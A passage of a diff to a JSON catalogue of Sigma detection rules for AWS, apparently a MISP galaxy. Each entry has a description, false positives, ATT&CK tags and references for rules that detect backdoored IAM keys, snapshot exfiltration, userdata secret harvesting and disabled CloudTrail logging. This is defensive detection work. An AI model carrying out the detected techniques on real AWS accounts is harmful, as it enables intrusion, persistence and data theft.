+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_ec2_disable_encryption.yml"
+ ],
+ "tags": [
+ "attack.impact",
+ "attack.t1486",
+ "attack.t1565"
+ ]
+ },
+ "uuid": "16124c2d-e40b-4fcc-8f2c-5ab7870a2223",
+ "value": "AWS EC2 Disable EBS Encryption"
+ },
+ {
+ "description": "Detects AWS API key creation for a user by another user.\nBackdoored users can be used to obtain persistence in the AWS environment.\nAlso with this alert, you can detect a flow of AWS keys in your org.\n",
+ "meta": {
+ "author": "faloker",
+ "creation_date": "2020/02/12",
+ "falsepositive": [
+ "Adding user keys to their own accounts (the filter cannot cover all possible variants of user naming)",
+ "AWS API keys legitimate exchange workflows"
+ ],
+ "filename": "aws_iam_backdoor_users_keys.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "aws",
+ "refs": [
+ "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam__backdoor_users_keys/main.py",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_iam_backdoor_users_keys.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.t1098"
+ ]
+ },
+ "uuid": "0a5177f4-6ca9-44c2-aacf-d3f3d8b6e4d2",
+ "value": "AWS IAM Backdoor Users Keys"
+ },
+ {
+ "description": "Detects the modification of the findings on SecurityHub.",
+ "meta": {
+ "author": "Sittikorn S",
+ "creation_date": "2021/06/28",
+ "falsepositive": [
+ "System or Network administrator behaviors",
+ "DEV, UAT, SAT environment. You should apply this rule with PROD environment only." 
+ ],
+ "filename": "aws_securityhub_finding_evasion.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "aws",
+ "refs": [
+ "https://docs.aws.amazon.com/cli/latest/reference/securityhub/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_securityhub_finding_evasion.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1562"
+ ]
+ },
+ "uuid": "a607e1fe-74bf-4440-a3ec-b059b9103157",
+ "value": "AWS SecurityHub Findings Evasion"
+ },
+ {
+ "description": "Detects when an Elastic Container Service (ECS) Task Definition has been modified and run.\nThis can indicate an adversary adding a backdoor to establish persistence or escalate privileges.\nThis rule is based on examining events created upon execution of Rhino Security Lab's Pacu in a lab environment.\n",
+ "meta": {
+ "author": "Darin Smith",
+ "creation_date": "2022/06/07",
+ "falsepositive": [
+ "Task Definition being modified to request credentials from the Task Metadata Service for valid reasons"
+ ],
+ "filename": "aws_ecs_task_definition_backdoor.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "aws",
+ "refs": [
+ "https://attack.mitre.org/techniques/T1525",
+ "https://docs.aws.amazon.com/AmazonECS/latest/APIReference/API_RegisterTaskDefinition.html",
+ "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ecs__backdoor_task_def/main.py",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_ecs_task_definition_backdoor.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.t1525"
+ ]
+ },
+ "uuid": "b94bf91e-c2bf-4047-9c43-c6810f43baad",
+ "value": "AWS ECS Backdoor Task Definition"
+ },
+ {
+ "description": "Detects an instance of an SES identity being deleted via the \"DeleteIdentity\" event. 
This may be an indicator of an adversary removing the account that carried out suspicious or malicious activities",
+ "meta": {
+ "author": "Janantha Marasinghe",
+ "creation_date": "2022/12/13",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "aws_delete_identity.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "aws",
+ "refs": [
+ "https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_delete_identity.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1070"
+ ]
+ },
+ "uuid": "20f754db-d025-4a8f-9d74-e0037e999a9a",
+ "value": "SES Identity Has Been Deleted"
+ },
+ {
+ "description": "Detects potential enumeration activity targeting AWS storage",
+ "meta": {
+ "author": "Janantha Marasinghe",
+ "creation_date": "2022/12/13",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "aws_enum_storage.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "aws",
+ "refs": [
+ "https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_enum_storage.yml"
+ ],
+ "tags": [
+ "attack.discovery",
+ "attack.t1619"
+ ]
+ },
+ "uuid": "4723218f-2048-41f6-bcb0-417f2d784f61",
+ "value": "Potential Storage Enumeration on AWS"
+ },
+ {
+ "description": "Detects the modification of an EC2 snapshot's permissions to enable access from another account",
+ "meta": {
+ "author": "Darin Smith",
+ "creation_date": "2021/05/17",
+ "falsepositive": [
+ "Valid change to a snapshot's permissions"
+ ],
+ "filename": "aws_snapshot_backup_exfiltration.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "aws",
+ "refs": [
+ "https://www.justice.gov/file/1080281/download",
+ "https://attack.mitre.org/techniques/T1537/",
+ 
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_snapshot_backup_exfiltration.yml"
+ ],
+ "tags": [
+ "attack.exfiltration",
+ "attack.t1537"
+ ]
+ },
+ "uuid": "abae8fec-57bd-4f87-aff6-6e3db989843d",
+ "value": "AWS Snapshot Backup Exfiltration"
+ },
+ {
+ "description": "Detects potential enumeration activity targeting an AWS instance backups",
+ "meta": {
+ "author": "Janantha Marasinghe",
+ "creation_date": "2022/12/13",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "aws_enum_backup.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "aws",
+ "refs": [
+ "https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_enum_backup.yml"
+ ],
+ "tags": [
+ "attack.discovery",
+ "attack.t1580"
+ ]
+ },
+ "uuid": "76255e09-755e-4675-8b6b-dbce9842cd2a",
+ "value": "Potential Backup Enumeration on AWS"
+ },
+ {
+ "description": "Detects when a EFS Fileshare Mount is modified or deleted. 
An adversary breaking any file system using the mount target that is being deleted, which might disrupt instances or applications using those mounts.",
+ "meta": {
+ "author": "Austin Songer @austinsonger",
+ "creation_date": "2021/08/15",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "aws_efs_fileshare_mount_modified_or_deleted.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "aws",
+ "refs": [
+ "https://docs.aws.amazon.com/efs/latest/ug/API_DeleteMountTarget.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_efs_fileshare_mount_modified_or_deleted.yml"
+ ],
+ "tags": [
+ "attack.impact",
+ "attack.t1485"
+ ]
+ },
+ "uuid": "6a7ba45c-63d8-473e-9736-2eaabff79964",
+ "value": "AWS EFS Fileshare Mount Modified or Deleted"
+ },
+ {
+ "description": "Detects when a request has been made to transfer a Route 53 domain to another AWS account.",
+ "meta": {
+ "author": "Elastic, Austin Songer @austinsonger",
+ "creation_date": "2021/07/22",
+ "falsepositive": [
+ "A domain may be transferred to another AWS account by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Domain transfers from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ],
+ "filename": "aws_route_53_domain_transferred_to_another_account.yml",
+ "level": "low",
+ "logsource.category": "No established category",
+ "logsource.product": "aws",
+ "refs": [
+ "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transferred_to_another_account.toml",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_route_53_domain_transferred_to_another_account.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.credential_access",
+ "attack.t1098"
+ ]
+ },
+ "uuid": "b056de1a-6e6e-4e40-a67e-97c9808cf41b",
+ "value": "AWS Route 53 Domain Transferred to Another Account"
+ },
+ {
+ "description": "Detects when the email sending feature is enabled for an AWS account and the email address verification request is dispatched in quick succession",
+ "meta": {
+ "author": "Janantha Marasinghe",
+ "creation_date": "2022/12/12",
+ "falsepositive": [
+ "Legitimate SES configuration activity"
+ ],
+ "filename": "aws_ses_messaging_enabled.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "aws",
+ "refs": [
+ "https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_ses_messaging_enabled.yml"
+ ],
+ "tags": [
+ "attack.t1583.006",
+ "attack.resource_development"
+ ]
+ },
+ "uuid": "60b84424-a724-4502-bd0d-cc676e1bc90e",
+ "value": "Potential AWS Cloud Email Service Abuse"
+ },
+ {
+ "description": "Detects when an user creates or invokes a lambda function.",
+ "meta": {
+ "author": "Austin Songer @austinsonger",
+ "creation_date": "2021/10/03",
+ "falsepositive": [
+ "Lambda Function created or invoked may be performed by a system administrator. 
Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.",
+ "If known behavior is causing false positives, it can be exempted from the rule."
+ ],
+ "filename": "aws_lambda_function_created_or_invoked.yml",
+ "level": "low",
+ "logsource.category": "No established category",
+ "logsource.product": "aws",
+ "refs": [
+ "https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_lambda_function_created_or_invoked.yml"
+ ],
+ "tags": [
+ "attack.privilege_escalation",
+ "attack.t1078"
+ ]
+ },
+ "uuid": "d914951b-52c8-485f-875e-86abab710c0b",
+ "value": "AWS Lambda Function Created or Invoked"
+ },
+ {
+ "description": "Identifies the suspicious use of AssumeRole. Attackers could move laterally and escalate privileges.",
+ "meta": {
+ "author": "Austin Songer @austinsonger",
+ "creation_date": "2021/07/24",
+ "falsepositive": [
+ "AssumeRole may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.",
+ "AssumeRole from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule.",
+ "Automated processes that uses Terraform may lead to false positives." 
+ ],
+ "filename": "aws_sts_assumerole_misuse.yml",
+ "level": "low",
+ "logsource.category": "No established category",
+ "logsource.product": "aws",
+ "refs": [
+ "https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRole.html",
+ "https://github.com/elastic/detection-rules/pull/1214",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_sts_assumerole_misuse.yml"
+ ],
+ "tags": [
+ "attack.lateral_movement",
+ "attack.privilege_escalation",
+ "attack.t1548",
+ "attack.t1550",
+ "attack.t1550.001"
+ ]
+ },
+ "uuid": "905d389b-b853-46d0-9d3d-dea0d3a3cd49",
+ "value": "AWS STS AssumeRole Misuse"
+ },
+ {
+ "description": "Detects the change of database master password. It may be a part of data exfiltration.",
+ "meta": {
+ "author": "faloker",
+ "creation_date": "2020/02/12",
+ "falsepositive": [
+ "Benign changes to a db instance"
+ ],
+ "filename": "aws_rds_change_master_password.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "aws",
+ "refs": [
+ "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/rds__explore_snapshots/main.py",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_rds_change_master_password.yml"
+ ],
+ "tags": [
+ "attack.exfiltration",
+ "attack.t1020"
+ ]
+ },
+ "uuid": "8a63cdd4-6207-414a-85bc-7e032bd3c1a2",
+ "value": "AWS RDS Master Password Change"
+ },
+ {
+ "description": "Identifies when an ElastiCache security group has been modified or deleted.",
+ "meta": {
+ "author": "Austin Songer @austinsonger",
+ "creation_date": "2021/07/24",
+ "falsepositive": [
+ "A ElastiCache security group deletion may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Security Group deletions from unfamiliar users or hosts should be investigated. 
If known behavior is causing false positives, it can be exempted from the rule."
+ ],
+ "filename": "aws_elasticache_security_group_modified_or_deleted.yml",
+ "level": "low",
+ "logsource.category": "No established category",
+ "logsource.product": "aws",
+ "refs": [
+ "https://github.com/elastic/detection-rules/blob/7d5efd68603f42be5e125b5a6a503b2ef3ac0f4e/rules/integrations/aws/impact_elasticache_security_group_modified_or_deleted.toml",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_elasticache_security_group_modified_or_deleted.yml"
+ ],
+ "tags": [
+ "attack.impact",
+ "attack.t1531"
+ ]
+ },
+ "uuid": "7c797da2-9cf2-4523-ba64-33b06339f0cc",
+ "value": "AWS ElastiCache Security Group Modified or Deleted"
+ },
+ {
+ "description": "Identifies when suspicious SAML activity has occurred in AWS. An adversary could gain backdoor access via SAML.",
+ "meta": {
+ "author": "Austin Songer",
+ "creation_date": "2021/09/22",
+ "falsepositive": [
+ "Automated processes that uses Terraform may lead to false positives.",
+ "SAML Provider could be updated by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.",
+ "SAML Provider being updated from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ],
+ "filename": "aws_susp_saml_activity.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "aws",
+ "refs": [
+ "https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithSAML.html",
+ "https://docs.aws.amazon.com/IAM/latest/APIReference/API_UpdateSAMLProvider.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_susp_saml_activity.yml"
+ ],
+ "tags": [
+ "attack.initial_access",
+ "attack.t1078",
+ "attack.lateral_movement",
+ "attack.t1548",
+ "attack.privilege_escalation",
+ "attack.t1550",
+ "attack.t1550.001"
+ ]
+ },
+ "uuid": "f43f5d2f-3f2a-4cc8-b1af-81fde7dbaf0e",
+ "value": "AWS Suspicious SAML Activity"
+ },
+ {
+ "description": "Identifies when an EKS cluster is created or deleted.",
+ "meta": {
+ "author": "Austin Songer",
+ "creation_date": "2021/08/16",
+ "falsepositive": [
+ "EKS Cluster being created or deleted may be performed by a system administrator.",
+ "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.",
+ "EKS Cluster created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule."
+ ],
+ "filename": "aws_eks_cluster_created_or_deleted.yml",
+ "level": "low",
+ "logsource.category": "No established category",
+ "logsource.product": "aws",
+ "refs": [
+ "https://any-api.com/amazonaws_com/eks/docs/API_Description",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml"
+ ],
+ "tags": [
+ "attack.impact",
+ "attack.t1485"
+ ]
+ },
+ "uuid": "33d50d03-20ec-4b74-a74e-1e65a38af1c0",
+ "value": "AWS EKS Cluster Created or Deleted"
+ },
+ {
+ "description": "Detects the recovery of a new public database instance from a snapshot. 
It may be a part of data exfiltration.",
+ "meta": {
+ "author": "faloker",
+ "creation_date": "2020/02/12",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "aws_rds_public_db_restore.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "aws",
+ "refs": [
+ "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/rds__explore_snapshots/main.py",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_rds_public_db_restore.yml"
+ ],
+ "tags": [
+ "attack.exfiltration",
+ "attack.t1020"
+ ]
+ },
+ "uuid": "c3f265c7-ff03-4056-8ab2-d486227b4599",
+ "value": "Restore Public AWS RDS Instance"
+ },
+ {
+ "description": "Detects disabling, deleting and updating of a Trail",
+ "meta": {
+ "author": "vitaliy0x1",
+ "creation_date": "2020/01/21",
+ "falsepositive": [
+ "Valid change in a Trail"
+ ],
+ "filename": "aws_cloudtrail_disable_logging.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "aws",
+ "refs": [
+ "https://docs.aws.amazon.com/awscloudtrail/latest/userguide/best-practices-security.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_cloudtrail_disable_logging.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1562.001"
+ ]
+ },
+ "uuid": "4db60cc0-36fb-42b7-9b58-a5b53019fb74",
+ "value": "AWS CloudTrail Important Change"
+ },
+ {
+ "description": "Detects changes to the EC2 instance startup script. 
The shell script will be executed as root/SYSTEM every time the specific instances are booted up.",
+ "meta": {
+ "author": "faloker",
+ "creation_date": "2020/02/12",
+ "falsepositive": [
+ "Valid changes to the startup script"
+ ],
+ "filename": "aws_ec2_startup_script_change.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "aws",
+ "refs": [
+ "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ec2__startup_shell_script/main.py#L9",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_ec2_startup_script_change.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1059.001",
+ "attack.t1059.003",
+ "attack.t1059.004"
+ ]
+ },
+ "uuid": "1ab3c5ed-5baf-417b-bb6b-78ca33f6c3df",
+ "value": "AWS EC2 Startup Shell Script Change"
+ },
+ {
+ "description": "An attacker with the iam:UpdateLoginProfile permission on other users can change the password used to login to the AWS console on any user that already has a login profile setup.\nWith this alert, it is used to detect anyone is changing password on behalf of other users.\n",
+ "meta": {
+ "author": "toffeebr33k",
+ "creation_date": "2021/08/09",
+ "falsepositive": [
+ "Legit User Account Administration"
+ ],
+ "filename": "aws_update_login_profile.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "aws",
+ "refs": [
+ "https://github.com/RhinoSecurityLabs/AWS-IAM-Privilege-Escalation",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_update_login_profile.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.t1098"
+ ]
+ },
+ "uuid": "055fb148-60f8-462d-ad16-26926ce050f1",
+ "value": "AWS User Login Profile Was Modified"
+ },
+ {
+ "description": "An attempt to export an AWS EC2 instance has been detected. 
A VM Export might indicate an attempt to extract information from an instance.",
+ "meta": {
+ "author": "Diogo Braz",
+ "creation_date": "2020/04/16",
+ "falsepositive": "No established falsepositives",
+ "filename": "aws_ec2_vm_export_failure.yml",
+ "level": "low",
+ "logsource.category": "No established category",
+ "logsource.product": "aws",
+ "refs": [
+ "https://docs.aws.amazon.com/vm-import/latest/userguide/vmexport.html#export-instance",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_ec2_vm_export_failure.yml"
+ ],
+ "tags": [
+ "attack.collection",
+ "attack.t1005",
+ "attack.exfiltration",
+ "attack.t1537"
+ ]
+ },
+ "uuid": "54b9a76a-3c71-4673-b4b3-2edb4566ea7b",
+ "value": "AWS EC2 VM Export Failure"
+ },
+ {
+ "description": "Detects bulk downloading of User Data associated with AWS EC2 instances. Instance User Data may include installation scripts and hard-coded secrets for deployment.",
+ "meta": {
+ "author": "faloker",
+ "creation_date": "2020/02/11",
+ "falsepositive": [
+ "Assets management software like device42"
+ ],
+ "filename": "aws_ec2_download_userdata.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "aws",
+ "refs": [
+ "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ec2__download_userdata/main.py",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_ec2_download_userdata.yml"
+ ],
+ "tags": [
+ "attack.exfiltration",
+ "attack.t1020"
+ ]
+ },
+ "uuid": "26ff4080-194e-47e7-9889-ef7602efed0c",
+ "value": "AWS EC2 Download Userdata"
+ },
+ {
+ "description": "Identifies the suspicious use of GetSessionToken. Tokens could be created and used by attackers to move laterally and escalate privileges.",
+ "meta": {
+ "author": "Austin Songer @austinsonger",
+ "creation_date": "2021/07/24",
+ "falsepositive": [
+ "GetSessionToken may be done by a system or network administrator. 
Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. GetSessionToken from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule."
+ ],
+ "filename": "aws_sts_getsessiontoken_misuse.yml",
+ "level": "low",
+ "logsource.category": "No established category",
+ "logsource.product": "aws",
+ "refs": [
+ "https://github.com/elastic/detection-rules/pull/1213",
+ "https://docs.aws.amazon.com/STS/latest/APIReference/API_GetSessionToken.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_sts_getsessiontoken_misuse.yml"
+ ],
+ "tags": [
+ "attack.lateral_movement",
+ "attack.privilege_escalation",
+ "attack.t1548",
+ "attack.t1550",
+ "attack.t1550.001"
+ ]
+ },
+ "uuid": "b45ab1d2-712f-4f01-a751-df3826969807",
+ "value": "AWS STS GetSessionToken Misuse"
+ },
+ {
+ "description": "Detects updates of the GuardDuty list of trusted IPs, perhaps to disable security alerts against malicious IPs.",
+ "meta": {
+ "author": "faloker",
+ "creation_date": "2020/02/11",
+ "falsepositive": [
+ "Valid change in the GuardDuty (e.g. 
to ignore internal scanners)"
+ ],
+ "filename": "aws_guardduty_disruption.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "aws",
+ "refs": [
+ "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/guardduty__whitelist_ip/main.py#L9",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_guardduty_disruption.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1562.001"
+ ]
+ },
+ "uuid": "6e61ee20-ce00-4f8d-8aee-bedd8216f7e3",
+ "value": "AWS GuardDuty Important Change"
+ },
+ {
+ "description": "Detects when an user attached a Lambda layer to an existing function to override a library that is in use by the function, where their malicious code could utilize the function's IAM role for AWS API calls.\nThis would give an adversary access to the privileges associated with the Lambda service role that is attached to that function.\n",
+ "meta": {
+ "author": "Austin Songer",
+ "creation_date": "2021/09/23",
+ "falsepositive": [
+ "Lambda Layer being attached may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.",
+ "Lambda Layer being attached from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ],
+ "filename": "aws_attached_malicious_lambda_layer.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "aws",
+ "refs": [
+ "https://docs.aws.amazon.com/lambda/latest/dg/API_UpdateFunctionConfiguration.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_attached_malicious_lambda_layer.yml"
+ ],
+ "tags": [
+ "attack.privilege_escalation"
+ ]
+ },
+ "uuid": "97fbabf8-8e1b-47a2-b7d5-a418d2b95e3d",
+ "value": "AWS Attached Malicious Lambda Layer"
+ },
+ {
+ "description": "Detects when a transfer lock was removed from a Route 53 domain. It is recommended to refrain from performing this action unless intending to transfer the domain to a different registrar.",
+ "meta": {
+ "author": "Elastic, Austin Songer @austinsonger",
+ "creation_date": "2021/07/22",
+ "falsepositive": [
+ "A domain transfer lock may be disabled by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Activity from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ],
+ "filename": "aws_route_53_domain_transferred_lock_disabled.yml",
+ "level": "low",
+ "logsource.category": "No established category",
+ "logsource.product": "aws",
+ "refs": [
+ "https://docs.aws.amazon.com/Route53/latest/APIReference/API_domains_DisableDomainTransferLock.html",
+ "https://docs.aws.amazon.com/Route53/latest/APIReference/API_Operations_Amazon_Route_53.html",
+ "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_route_53_domain_transferred_lock_disabled.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.credential_access",
+ "attack.t1098"
+ ]
+ },
+ "uuid": "3940b5f1-3f46-44aa-b746-ebe615b879e0",
+ "value": "AWS Route 53 Domain Transfer Lock Disabled"
+ },
+ {
+ "description": "Detects evade to Macie detection.",
+ "meta": {
+ "author": "Sittikorn S",
+ "creation_date": "2021/07/06",
+ "falsepositive": [
+ "System or Network administrator behaviors"
+ ],
+ "filename": "aws_macic_evasion.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "aws",
+ "refs": [
+ "https://docs.aws.amazon.com/cli/latest/reference/macie/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_macic_evasion.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1562.001"
+ ]
+ },
+ "uuid": "91f6a16c-ef71-437a-99ac-0b070e3ad221",
+ "value": "AWS Macie Evasion"
+ },
+ {
+ "description": "Detects when a EFS Fileshare is modified or deleted.\nYou can't delete a file system that is in use.\nIf the file system has any mount targets, the adversary must first delete them, so deletion of a mount will occur before deletion of a fileshare.\n",
+ "meta": {
+ "author": "Austin Songer @austinsonger",
+ "creation_date": "2021/08/15",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": 
"aws_efs_fileshare_modified_or_deleted.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "aws",
+ "refs": [
+ "https://docs.aws.amazon.com/efs/latest/ug/API_DeleteFileSystem.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_efs_fileshare_modified_or_deleted.yml"
+ ],
+ "tags": [
+ "attack.impact"
+ ]
+ },
+ "uuid": "25cb1ba1-8a19-4a23-a198-d252664c8cef",
+ "value": "AWS EFS Fileshare Modified or Deleted"
+ },
+ {
+ "description": "Detects enumeration of accounts configuration via api call to list different instances and services within a short period of time.",
+ "meta": {
+ "author": "toffeebr33k",
+ "creation_date": "2020/11/21",
+ "falsepositive": [
+ "AWS Config or other configuration scanning activities"
+ ],
+ "filename": "aws_enum_listing.yml",
+ "level": "low",
+ "logsource.category": "No established category",
+ "logsource.product": "aws",
+ "refs": [
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_enum_listing.yml"
+ ],
+ "tags": [
+ "attack.discovery",
+ "attack.t1592"
+ ]
+ },
+ "uuid": "e9c14b23-47e2-4a8b-8a63-d36618e33d70",
+ "value": "Account Enumeration on AWS"
+ },
+ {
+ "description": "Detects network enumeration performed on AWS.",
+ "meta": {
+ "author": "Janantha Marasinghe",
+ "creation_date": "2022/12/13",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "aws_enum_network.yml",
+ "level": "low",
+ "logsource.category": "No established category",
+ "logsource.product": "aws",
+ "refs": [
+ "https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_enum_network.yml"
+ ],
+ "tags": [
+ "attack.discovery",
+ "attack.t1016"
+ ]
+ },
+ "uuid": "c3d53999-4b14-4ddd-9d9b-e618c366b54d",
+ "value": "Potential Network Enumeration on AWS"
+ },
+ {
+ "description": "Detects possible suspicious glue development endpoint activity.",
+ "meta": {
+ "author": "Austin Songer 
@austinsonger", + "creation_date": "2021/10/03", + "falsepositive": [ + "Glue Development Endpoint Activity may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "aws_passed_role_to_glue_development_endpoint.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://docs.aws.amazon.com/glue/latest/webapi/API_CreateDevEndpoint.html", + "https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_passed_role_to_glue_development_endpoint.yml" + ], + "tags": [ + "attack.privilege_escalation" + ] + }, + "uuid": "4990c2e3-f4b8-45e3-bc3c-30b14ff0ed26", + "value": "AWS Glue Development Endpoint Activity" + }, + { + "description": "Detects AWS root account usage", + "meta": { + "author": "vitaliy0x1", + "creation_date": "2020/01/21", + "falsepositive": [ + "AWS Tasks That Require AWS Account Root User Credentials https://docs.aws.amazon.com/general/latest/gr/aws_tasks-that-require-root.html" + ], + "filename": "aws_root_account_usage.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_root_account_usage.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1078.004" + ] + }, + "uuid": "8ad1600d-e9dc-4251-b0ee-a65268f29add", + "value": "AWS Root Credentials" + }, + { + "description": "Detects AWS Config Service disabling", + "meta": { + "author": "vitaliy0x1", + "creation_date": "2020/01/21", + "falsepositive": [ + "Valid change in AWS Config Service" + ], + "filename": "aws_config_disable_recording.yml", 
